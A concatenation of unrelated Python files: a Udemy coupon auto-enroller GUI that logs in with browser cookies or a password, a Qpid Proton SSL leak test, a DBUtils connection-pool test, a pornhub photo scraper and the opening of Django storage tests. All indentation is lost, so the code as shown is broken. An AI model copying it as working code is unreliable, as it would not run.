js = free_checkout(coupon_id, course_id)
try:
if js["status"] == "succeeded":
main_window["out"].print(
"Successfully Enrolled To Course :)",
text_color="green",
)
main_window["out"].print()
se_c += 1
as_c += amount
if settings["save_txt"]:
txt_file.write(combo + "\n")
txt_file.flush()
os.fsync(txt_file.fileno())
elif js["status"] == "failed":
# print(js)
main_window["out"].print(
"Coupon Expired :(", text_color="red"
)
main_window["out"].print()
e_c += 1
except:
try:
msg = js["detail"]
main_window["out"].print(
f"{msg}", text_color="dark blue"
)
main_window["out"].print()
print(js)
slp = int(re.search(r"\d+", msg).group(0))
except:
# print(js)
main_window["out"].print(
"Expired Coupon", text_color="red"
)
main_window["out"].print()
e_c += 1
if slp != "":
slp += 5
main_window["out"].print(
">>> Pausing execution of script for "
+ str(slp)
+ " seconds",
text_color="red",
)
time.sleep(slp)
main_window["out"].print()
else:
time.sleep(3.5)
elif not coupon_id:
if settings["discounted_only"]:
main_window["out"].print(
"Free course excluded", text_color="light blue"
)
ex_c += 1
continue
js = free_enroll(course_id)
try:
if js["_class"] == "course":
main_window["out"].print(
"Successfully Subscribed", text_color="green"
)
main_window["out"].print()
se_c += 1
as_c += amount
if settings["save_txt"]:
txt_file.write(combo + "\n")
txt_file.flush()
os.fsync(txt_file.fileno())
except:
main_window["out"].print(
"COUPON MIGHT HAVE EXPIRED", text_color="red"
)
main_window["out"].print()
e_c += 1
elif purchased:
main_window["out"].print(purchased, text_color="light blue")
main_window["out"].print()
ae_c += 1
elif not course_id:
main_window["out"].print(".Course Expired.", text_color="red")
e_c += 1
main_window["pout"].update(index + 1)
except:
e = traceback.format_exc()
print(e)
main_window["done_col"].update(visible=True)
main_window["se_c"].update(value=f"Successfully Enrolled: {se_c}")
main_window["as_c"].update(value=f"Amount Saved: ${round(as_c,2)}")
main_window["ae_c"].update(value=f"Already Enrolled: {ae_c}")
main_window["e_c"].update(value=f"Expired Courses: {e_c}")
main_window["ex_c"].update(value=f"Excluded Courses: {ex_c}")
##########################################
def main1():
try:
links_ls = []
for key in funcs:
main_window[f"pcol{key}"].update(visible=True)
main_window["main_col"].update(visible=False)
main_window["scrape_col"].update(visible=True)
for key in funcs:
funcs[key].start()
for t in funcs:
funcs[t].join()
main_window["scrape_col"].update(visible=False)
main_window["output_col"].update(visible=True)
for link_list in [
"du_links",
"uf_links",
"tb_links",
"rd_links",
"cv_links",
"idc_links",
"en_links",
]:
try:
links_ls += eval(link_list)
except:
pass
auto(remove_duplicates(links_ls))
except:
e = traceback.format_exc()
sg.popup_scrolled(e, title=f"Unknown Error {version}")
main_window["output_col"].Update(visible=False)
settings, instructor_exclude, title_exclude = load_settings()
login_title, main_title = update_available()
############## MAIN ############# MAIN############## MAIN ############# MAIN ############## MAIN ############# MAIN ###########
menu = [["Help", ["Support", "Github", "Discord"]]]
login_error = False
try:
if settings["stay_logged_in"]["auto"]:
my_cookies, cookies = fetch_cookies()
head, user, currency, s = check_login(
my_cookies["client_id"], my_cookies["access_token"], my_cookies["csrftoken"]
)
elif settings["stay_logged_in"]["manual"]:
txt, client_id, access_token, csrf_token = manual_login()
if not txt:
head, user, currency, s = check_login(client_id, access_token, csrf_token)
except:
login_error = True
if (
not settings["stay_logged_in"]["auto"] and not settings["stay_logged_in"]["manual"]
) or login_error:
c1 = [
[
sg.Button(key="a_login", image_data=auto_login),
sg.T(""),
sg.B(key="m_login", image_data=manual_login_),
],
[
sg.Checkbox(
"Stay logged-in",
default=settings["stay_logged_in"]["auto"],
key="sli_a",
)
],
]
c2 = [
[
sg.T("Email"),
sg.InputText(
default_text=settings["email"], key="email", size=(20, 1), pad=(5, 5)
),
],
[
sg.T("Password"),
sg.InputText(
default_text=settings["password"],
key="password",
size=(20, 1),
pad=(5, 5),
password_char="*",
),
],
[
sg.Checkbox(
"Stay logged-in",
default=settings["stay_logged_in"]["manual"],
key="sli_m",
)
],
[
sg.B(key="Back", image_data=back),
sg.T(" "),
sg.B(key="Login", image_data=login),
],
]
login_layout = [
[sg.Menu(menu)],
[sg.Column(c1, key="col1"), sg.Column(c2, visible=False, key="col2")],
]
login_window = sg.Window(login_title, login_layout)
while True:
event, values = login_window.read()
if event in (None,):
login_window.close()
sys.exit()
elif event == "a_login":
try:
my_cookies, cookies = fetch_cookies()
try:
head, user, currency, s = check_login(
my_cookies["client_id"],
my_cookies["access_token"],
my_cookies["csrftoken"],
)
settings["stay_logged_in"]["auto"] = values["sli_a"]
save_settings()
login_window.close()
break
except Exception as e:
sg.popup_auto_close(
"Make sure you are logged in to udemy.com in chrome browser",
title="Error",
auto_close_duration=5,
no_titlebar=True,
)
except Exception as e:
e = traceback.format_exc()
sg.popup_scrolled(e, title=f"Unknown Error {version}")
elif event == "m_login":
login_window["col1"].update(visible=False)
login_window["col2"].update(visible=True)
login_window["email"].update(value=settings["email"])
login_window["password"].update(value=settings["password"])
elif event == "Github":
web("https://github.com/techtanic/Discounted-Udemy-Course-Enroller")
elif event == "Support":
web("https://techtanic.github.io/duce/")
elif event == "Discord":
web("https://discord.gg/wFsfhJh4Rh")
elif event == "Back":
login_window["col1"].update(visible=True)
login_window["col2"].update(visible=False)
elif event == "Login":
settings["email"] = values["email"]
settings["password"] = values["password"]
try:
txt, client_id, access_token, csrf_token = manual_login()
if not txt:
head, user, currency, s = check_login(
client_id, access_token, csrf_token
)
settings["stay_logged_in"]["manual"] = values["sli_m"]
save_settings()
login_window.close()
break
else:
sg.popup_auto_close(
txt,
title="Error",
auto_close_duration=5,
no_titlebar=True,
)
except:
e = traceback.format_exc()
sg.popup_scrolled(e, title=f"Unknown Error {version}")
checkbox_lo = []
for key in settings["sites"]:
checkbox_lo.append([sg.Checkbox(key, key=key, default=settings["sites"][key])])
categories_lo = []
categories_k = list(settings["categories"].keys())
categories_v = list(settings["categories"].values())
for index, _ in enumerate(settings["categories"]):
if index % 3 == 0:
try:
categories_lo.append(
[
sg.Checkbox(
categories_k[index],
default=categories_v[index],
key=categories_k[index],
size=(16, 1),
),
sg.Checkbox(
categories_k[index + 1],
default=categories_v[index + 1],
key=categories_k[index + 1],
size=(16, 1),
),
sg.Checkbox(
categories_k[index + 2],
default=categories_v[index + 2],
key=categories_k[index + 2],
size=(15, 1),
),
]
)
except:
categories_lo.append(
[
sg.Checkbox(
categories_k[index],
default=categories_v[index],
key=categories_k[index],
size=(17, 1),
)
]
)
languages_lo = []
languages_k = list(settings["languages"].keys())
languages_v = list(settings["languages"].values())
for index, _ in enumerate(settings["languages"]):
if index % 3 == 0:
try:
languages_lo.append(
[
sg.Checkbox(
languages_k[index],
default=languages_v[index],
key=languages_k[index],
size=(8, 1),
),
sg.Checkbox(
languages_k[index + 1],
default=languages_v[index + 1],
key=languages_k[index + 1],
size=(8, 1),
),
sg.Checkbox(
languages_k[index + 2],
default=languages_v[index + 2],
key=languages_k[index + 2],
size=(8, 1),
),
]
)
except IndexError:
languages_lo.append(
[
sg.Checkbox(
languages_k[index],
default=languages_v[index],
key=languages_k[index],
size=(8, 1),
),
sg.Checkbox(
languages_k[index + 1],
default=languages_v[index + 1],
key=languages_k[index + 1],
size=(8, 1),
),
]
)
main_tab = [
[
sg.Frame(
"Websites",
checkbox_lo,
"#4deeea",
border_width=4,
title_location="n",
key="fcb",
),
sg.Frame(
"Language",
languages_lo,
"#4deeea",
border_width=4,
title_location="n",
key="fl",
),
],
[
sg.Frame(
"Category",
categories_lo,
"#4deeea",
border_width=4,
title_location="n",
key="fc",
)
],
]
instructor_ex_lo = [
[
sg.Multiline(
default_text=instructor_exclude, key="instructor_exclude", size=(15, 10)
)
],
[sg.Text("Paste instructor(s)\nusername in new lines")],
]
title_ex_lo = [
[sg.Multiline(default_text=title_exclude, key="title_exclude", size=(20, 10))],
[sg.Text("Keywords in new lines\nNot cAsE sensitive")],
]
rating_lo = [
[
sg.Spin(
[0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0],
initial_value=settings["min_rating"],
key="min_rating",
font=25,
),
sg.Text("0.0 <-> 5.0", font=15),
]
]
advanced_tab = [
[
sg.Frame(
"Exclude Instructor",
instructor_ex_lo,
"#4deeea",
border_width=4,
title_location="n",
font=25,
),
sg.Frame(
"Title Keyword Exclusion",
title_ex_lo,
"#4deeea",
border_width=4,
title_location="n",
font=25,
),
],
[
sg.Frame(
"Minimum Rating",
rating_lo,
"#4deeea",
border_width=4,
title_location="n",
key="f_min_rating",
font=25,
)
],
[
sg.Checkbox(
"Save enrolled courses in txt", key="save_txt", default=settings["save_txt"]
)
],
[
sg.Checkbox(
"Enroll in Discounted courses only",
key="discounted_only",
default=settings["discounted_only"],
)
],
]
scrape_col = []
for key in settings["sites"]:
scrape_col.append(
[
sg.pin(
sg.Column(
[
[
sg.Text(key, size=(12, 1)),
sg.ProgressBar(
3,
orientation="h",
key=f"p{key}",
bar_color=("#1c6fba", "#000000"),
border_width=1,
size=(20, 20),
),
sg.Image(data=check_mark, visible=False, key=f"i{key}"),
]
],
key=f"pcol{key}",
visible=False,
)
)
]
)
output_col = [
[sg.Text("Output")],
[sg.Multiline(size=(69, 12), key="out", autoscroll=True, disabled=True)],
[
sg.ProgressBar(
3,
orientation="h",
key="pout",
bar_color=("#1c6fba", "#000000"),
border_width=1,
size=(46, 20),
)
],
]
done_col = [
[sg.Text(" Stats", text_color="#FFD700")],
[
sg.Text(
"Successfully Enrolled: ",
key="se_c",
text_color="#7CFC00",
)
],
[
sg.Text(
"Amount Saved: $ ",
key="as_c",
text_color="#00FA9A",
)
],
[sg.Text("Already Enrolled: ", key="ae_c", text_color="#00FFFF")],
[sg.Text("Expired Courses: ", key="e_c", text_color="#FF0000")],
[sg.Text("Excluded Courses: ", key="ex_c", text_color="#FF4500")],
]
main_col = [
[
sg.TabGroup(
[[sg.Tab("Main", main_tab), sg.Tab("Advanced", advanced_tab)]],
border_width=2,
font=25,
)
],
[
sg.Button(
key="Start",
tooltip="Once started will not stop until completed",
image_data=start,
)
],
]
if settings["stay_logged_in"]["auto"] or settings["stay_logged_in"]["manual"]:
logout_btn_lo = sg.Button(key="Logout", image_data=logout)
else:
logout_btn_lo = sg.Button(key="Logout", image_data=logout, visible=False)
main_lo = [
[
sg.Menu(
menu,
key="mn",
)
],
[sg.Text(f"Logged in as: {user}", key="user_t"), logout_btn_lo],
[
sg.pin(sg.Column(main_col, key="main_col")),
sg.pin(sg.Column(output_col, key="output_col", visible=False)),
sg.pin(sg.Column(scrape_col, key="scrape_col", visible=False)),
sg.pin(sg.Column(done_col, key="done_col", visible=False)),
],
[sg.Button(key="Exit", image_data=exit_)],
]
# ,sg.Button(key='Dummy',image_data=back)
global main_window
main_window = sg.Window(main_title, main_lo, finalize=True)
threading.Thread(target=update_courses, daemon=True).start()
update_available()
while True:
event, values = main_window.read()
if event == "Dummy":
print(values)
if event in (None, "Exit"):
break
elif event == "Logout":
settings["stay_logged_in"]["auto"], settings["stay_logged_in"]["manual"] = (
False,
False,
)
save_settings()
break
elif event == "Support":
web("https://techtanic.github.io/duce/support/#")
elif event == "Github":
web("https://github.com/techtanic/Discounted-Udemy-Course-Enroller")
elif event == "Discord":
web("https://discord.gg/wFsfhJh4Rh")
elif event == "Start":
for key in settings["languages"]:
settings["languages"][key] = values[key]
for key in settings["categories"]:
settings["categories"][key] = values[key]
for key in settings["sites"]:
settings["sites"][key] = values[key]
settings["instructor_exclude"] = values["instructor_exclude"].split()
settings["title_exclude"] = list(
filter(None, values["title_exclude"].split("\n"))
)
settings["min_rating"] = float(values["min_rating"])
settings["save_txt"] = values["save_txt"]
settings["discounted_only"] = values["discounted_only"]
save_settings()
all_functions = create_scrape_obj()
funcs = {}
sites = {}
categories = []
languages = []
instructor_exclude = settings["instructor_exclude"]
title_exclude = settings["title_exclude"]
min_rating = settings["min_rating"]
user_dumb = True
for key in settings["sites"]:
if values[key]:
funcs[key] = all_functions[key]
sites[key] = settings["sites"][key]
user_dumb = False
for key in settings["categories"]:
if values[key]:
categories.append(key)
for key in settings["languages"]:
if values[key]:
languages.append(key)
if user_dumb:
sg.popup_auto_close(
"What do you even expect to happen!",
auto_close_duration=5,
no_titlebar=True,
)
if not user_dumb:
# for key in all_functions:
# main_window[f"p{key}"].update(0, visible=True)
# main_window[f"img{index}"].update(visible=False)
# main_window[f"pcol{index}"].update(visible=False)
threading.Thread(target=main1, daemon=True).start()
main_window.close()
|
test_PROTON_2111_container_ssl_ssldomain_object_leak.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
"""
PROTON-2111 python: memory leak on Container, SSL, and SSLDomain objects
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import os
import platform
import socket
import threading
import unittest
import cproton
import proton.handlers
import proton.utils
import proton.reactor
class Broker(proton.handlers.MessagingHandler):
def __init__(self, acceptor_url, ssl_domain=None):
# type: (str, proton.SSLDomain) -> None
super(Broker, self).__init__()
self.acceptor_url = acceptor_url
self.ssl_domain = ssl_domain
self.acceptor = None
self._acceptor_opened_event = threading.Event()
self.on_message_ = threading.Event()
def get_acceptor_sockname(self):
# type: () -> (str, int)
self._acceptor_opened_event.wait()
if hasattr(self.acceptor, '_selectable'): # proton 0.30.0+
sockname = self.acceptor._selectable._delegate.getsockname()
else: # works in proton 0.27.0
selectable = cproton.pn_cast_pn_selectable(self.acceptor._impl)
fd = cproton.pn_selectable_get_fd(selectable)
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
sockname = s.getsockname()
return sockname[:2]
def on_start(self, event):
self.acceptor = event.container.listen(self.acceptor_url, ssl_domain=self.ssl_domain)
self._acceptor_opened_event.set()
def on_link_opening(self, event):
link = event.link # type: proton.Link
if link.is_sender:
assert not link.remote_source.dynamic, "This cannot happen"
link.source.address = link.remote_source.address
elif link.remote_target.address:
link.target.address = link.remote_target.address
def on_message(self, event):
self.on_message_.set()
@contextlib.contextmanager
def test_broker(ssl_domain=None):
# type: (proton.SSLDomain) -> Broker
broker = Broker('localhost:0', ssl_domain=ssl_domain)
container = proton.reactor.Container(broker)
t = threading.Thread(target=container.run)
t.start()
yield broker
container.stop()
if broker.acceptor:
broker.acceptor.close()
t.join()
class SampleSender(proton.handlers.MessagingHandler):
def __init__(self, msg_id, urls, ssl_domain=None, *args, **kwargs):
# type: (str, str, proton.SSLDomain, *object, **object) -> None
super(SampleSender, self).__init__(*args, **kwargs)
self.urls = urls
self.msg_id = msg_id
self.ssl_domain = ssl_domain
def on_start(self, event):
# type: (proton.Event) -> None
conn = event.container.connect(url=self.urls, reconnect=False, ssl_domain=self.ssl_domain)
event.container.create_sender(conn, target='topic://VirtualTopic.event')
def on_sendable(self, event):
msg = proton.Message(body={'msg-id': self.msg_id, 'name': 'python'})
event.sender.send(msg)
event.sender.close()
event.connection.close()
def on_connection_error(self, event):
print("on_error", event)
class Proton2111Test(unittest.TestCase):
@unittest.skipIf(platform.system() == 'Windows', "TODO jdanek: Test is broken on Windows")
def test_send_message_ssl_no_object_leaks(self):
"""Starts a broker with ssl acceptor, in a loop connects to it and sends message.
The test checks that number of Python objects is not increasing inside the loop.
"""
cwd = os.path.dirname(__file__)
cert_file = os.path.join(cwd, 'certificates', 'localhost_ca1.pem')
key_file = os.path.join(cwd, 'certificates', 'localhost_ca1-key.pem')
certificate_db = os.path.join(cwd, 'certificates', 'ca1.pem')
password = None
broker_ssl_domain = proton.SSLDomain(proton.SSLDomain.MODE_SERVER)
broker_ssl_domain.set_credentials(cert_file, key_file, password=password)
client_ssl_domain = proton.SSLDomain(proton.SSLDomain.MODE_CLIENT)
client_ssl_domain.set_trusted_ca_db(certificate_db)
client_ssl_domain.set_peer_authentication(proton.SSLDomain.VERIFY_PEER)
def send_msg(msg_id, urls):
container = proton.reactor.Container(SampleSender(msg_id, urls, client_ssl_domain))
container.run()
with test_broker(ssl_domain=broker_ssl_domain) as broker:
urls = "amqps://{0}:{1}".format(*broker.get_acceptor_sockname())
gc.collect()
object_counts = []
for i in range(300):
send_msg(i + 1, urls)
broker.on_message_.wait() # message got through
broker.on_message_.clear()
gc.collect()
object_counts.append(len(gc.get_objects()))
# drop first few values, it is usually different (before counts settle)
object_counts = object_counts[2:]
diffs = [c - object_counts[0] for c in object_counts]
for diff in diffs:
# allow for random variation from initial value on some systems, but prohibit linear growth
self.assertTrue(diff <= 50, "Object counts should not be increasing: {0}".format(diffs))
|
TestPooledPg.py | """Test the PooledPg module.
Note:
We don't test performance here, so the test does not predicate
whether PooledPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
__version__ = '1.0'
__revision__ = "$Rev: 7680 $"
__date__ = "$Date$"
import sys
import unittest
sys.path.insert(1, '../..')
# The TestSteadyPg module serves as a mock object for the pg API module:
from DBUtils.Testing import TestSteadyPg
from DBUtils.PooledPg import PooledPg
class TestPooledPg(unittest.TestCase):
def test0_CheckVersion(self):
from DBUtils import __version__ as DBUtilsVersion
self.assertEqual(DBUtilsVersion, __version__)
from DBUtils.PooledPg import __version__ as PooledPgVersion
self.assertEqual(PooledPgVersion, __version__)
self.assertEqual(PooledPg.version, __version__)
def test1_CreateConnection(self):
pool = PooledPg(1, 1, 0, False, None, None,
'PooledPgTestDB', user='PooledPgTestUser')
self.assert_(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 1)
self.assert_(hasattr(pool, '_maxusage'))
self.assertEqual(pool._maxusage, None)
self.assert_(hasattr(pool, '_setsession'))
self.assert_(pool._setsession is None)
db_con = pool._cache.get(0)
pool._cache.put(db_con, 0)
from DBUtils.SteadyPg import SteadyPgConnection
self.assert_(isinstance(db_con, SteadyPgConnection))
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assert_(hasattr(db, '_con'))
self.assertEqual(db._con, db_con)
self.assert_(hasattr(db, 'query'))
self.assert_(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
self.assert_(hasattr(db, '_maxusage'))
self.assertEqual(db._maxusage, 0)
self.assert_(hasattr(db, '_setsession_sql'))
self.assert_(db._setsession_sql is None)
self.assert_(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assert_(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
db.query('select test')
self.assertEqual(db.num_queries, 1)
pool = PooledPg(1)
db = pool.connection()
self.assert_(hasattr(db, 'dbname'))
self.assert_(db.dbname is None)
self.assert_(hasattr(db, 'user'))
self.assert_(db.user is None)
self.assert_(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
pool = PooledPg(0, 0, 0, False, 3, ('set datestyle',),)
self.assertEqual(pool._maxusage, 3)
self.assertEqual(pool._setsession, ('set datestyle',))
db = pool.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
def test2_CloseConnection(self):
pool = PooledPg(0, 1, 0, False, None, None,
'PooledPgTestDB', user='PooledPgTestUser')
db = pool.connection()
self.assert_(hasattr(db, '_con'))
db_con = db._con
from DBUtils.SteadyPg import SteadyPgConnection
self.assert_(isinstance(db_con, SteadyPgConnection))
self.assert_(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(db.num_queries, 0)
db.query('select test')
self.assertEqual(db.num_queries, 1)
db.close()
self.assert_(not hasattr(db, 'num_queries'))
db = pool.connection()
self.assert_(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assert_(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
self.assertEqual(db.num_queries, 1)
db.query('select test')
self.assertEqual(db.num_queries, 2)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 1)
self.assertEqual(pool._cache.get(0), db_con)
def test3_MinMaxCached(self):
pool = PooledPg(3)
self.assert_(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = []
for i in range(3):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 6)
pool = PooledPg(3, 4)
self.assert_(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = []
for i in range(3):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 4)
pool = PooledPg(3, 2)
self.assert_(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = []
for i in range(4):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(4):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
pool = PooledPg(2, 5)
self.assert_(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 2)
cache = []
for i in range(10):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(10):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 5)
def test4_MaxConnections(self):
from DBUtils.PooledPg import TooManyConnections
pool = PooledPg(1, 2, 3)
self.assertEqual(pool._cache.qsize(), 1)
cache = []
for i in range(3):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(0, 1, 1, False)
self.assertEqual(pool._blocking, 0)
self.assertEqual(pool._cache.qsize(), 0)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(1, 2, 1)
self.assertEqual(pool._cache.qsize(), 1)
cache = []
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(3, 2, 1, False)
self.assertEqual(pool._cache.qsize(), 3)
cache = []
for i in range(3):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(1, 1, 1, True)
self.assertEqual(pool._blocking, 1)
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
def connection():
pool.connection().query('set thread')
from threading import Thread
thread = Thread(target=connection)
thread.start()
thread.join(0.1)
self.assert_(thread.isAlive())
self.assertEqual(pool._cache.qsize(), 0)
session = db._con.session
self.assertEqual(session, [])
del db
thread.join(0.1)
self.assert_(not thread.isAlive())
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(session, ['thread'])
def test5_OneThreadTwoConnections(self):
pool = PooledPg(2)
db1 = pool.connection()
for i in range(5):
db1.query('select test')
db2 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
for i in range(7):
db2.query('select test')
self.assertEqual(db1.num_queries, 5)
self.assertEqual(db2.num_queries, 7)
del db1
db1 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assert_(hasattr(db1, 'query'))
for i in range(3):
db1.query('select test')
self.assertEqual(db1.num_queries, 8)
db2.query('select test')
self.assertEqual(db2.num_queries, 8)
def test6_ThreeThreadsTwoConnections(self):
pool = PooledPg(2, 2, 2, True)
from Queue import Queue, Empty
queue = Queue(3)
def connection():
try:
queue.put(pool.connection(), 1, 1)
except TypeError:
queue.put(pool.connection(), 1)
from threading import Thread
for i in range(3):
Thread(target=connection).start()
try:
db1 = queue.get(1, 1)
db2 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
db2 = queue.get(1)
db1_con = db1._con
db2_con = db2._con
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1_con, db2_con)
try:
self.assertRaises(Empty, queue.get, 1, 0.1)
except TypeError:
self.assertRaises(Empty, queue.get, 0)
del db1
try:
db1 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertEqual(db1._con, db1_con)
if __name__ == '__main__':
unittest.main()
|
photos.py | # -*- coding: UTF-8 -*-
from .core import *
class Photos(object):
def __init__(self, ProxyDictionary, keywords=[], *args):
self.keywords = keywords
self.ProxyDictionary = ProxyDictionary
self.photos_queue = Queue()
def _loadAlbumsPage(self, page_num):
# url example:
# pornhub.com/albums/female-straight?search=arg1+arg2
# pornhub.com/albums/uncategorized?search=arg1&page=3
payload = {"search" : "", "page" : page_num}
categories = list()
for item in self.keywords:
if (item == "female"):
categories.append(item)
elif (item == "straight"):
categories.append(item)
elif (item == "misc"):
categories.append(item)
elif (item == "male"):
categories.append(item)
elif (item == "gay"):
categories.append(item)
else:
payload["search"] += (item + " ")
search_url = BASE_URL + ALBUMS_URL + "-".join(categories) + "?"
r = requests.get(search_url, params=payload, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
return BeautifulSoup(html, "lxml")
def _scrapAlbumsURL(self, soup_data):
album_divs = soup_data.find_all("div", { "class" : "photoAlbumListBlock" } )
albums_url = list()
for album_div in album_divs:
for a_tag in album_div.find_all("a", href=True):
url = a_tag.attrs["href"]
if isAlbum(url):
albums_url.append(BASE_URL + url)
break
return albums_url
def _scrapPhotoFullURL(self, preview_url):
r = requests.get(preview_url, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
soup = BeautifulSoup(html, "lxml")
for image in soup.find_all("img", src=True):
image_url = image.attrs["src"]
if isPhoto(image_url):
self.photos_queue.put(str(image_url))
return image_url
return False
def _scrapAlbumPhotos(self, album_url):
r = requests.get(album_url, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
soup = BeautifulSoup(html, "lxml")
for possible_image in soup.find_all("a", href=True):
try:
preview_url = possible_image.attrs["href"]
if isPhotoPreview(preview_url):
yield (BASE_URL + preview_url)
except Exception as E:
pass
def getPhotos(self, quantity = 1, page = 1, infinity = False):
"""
Download photos.
:param quantity: number of photos to return
:param page: starting page number
:param infinity: never stop downloading
"""
quantity = quantity if quantity >= 1 else 1
page = page if page >= 1 else 1
found = 0
workers = list()
while True:
for album_url in self._scrapAlbumsURL(self._loadAlbumsPage(page)):
for preview_url in self._scrapAlbumPhotos(album_url):
worker = Thread(target=self._scrapPhotoFullURL, kwargs={"preview_url" : preview_url})
worker.start()
workers.append(worker)
while not self.photos_queue.empty():
if (found < quantity) or (infinity):
yield self.photos_queue.get()
found += 1
else:
raise StopIteration
if (len(workers)+1) % 4 == 0:
time.sleep(TIME_TO_WAIT)
page += 1
|
tests.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import time
import unittest
from datetime import datetime, timedelta
try:
import threading
except ImportError:
import dummy_threading as threading
from django.core.cache import cache
from django.core.exceptions import SuspiciousOperation
from django.core.files.base import File, ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import LiveServerTestCase, SimpleTestCase
from django.test import override_settings
from django.utils import six
from django.utils.six.moves.urllib.request import urlopen
from django.utils._os import upath
from .models import Storage, temp_storage, temp_storage_location
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with six.assertRaisesRegex(self, ImportError, "No module named '?storage'?"):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
self.assertRaises(ImportError, get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
# Error message may or may not be the fully qualified path.
with six.assertRaisesRegex(self, ImportError,
"No module named '?(django.core.files.)?non_existing_storage'?"):
get_storage_class(
'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageDeconstructionTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, tuple())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
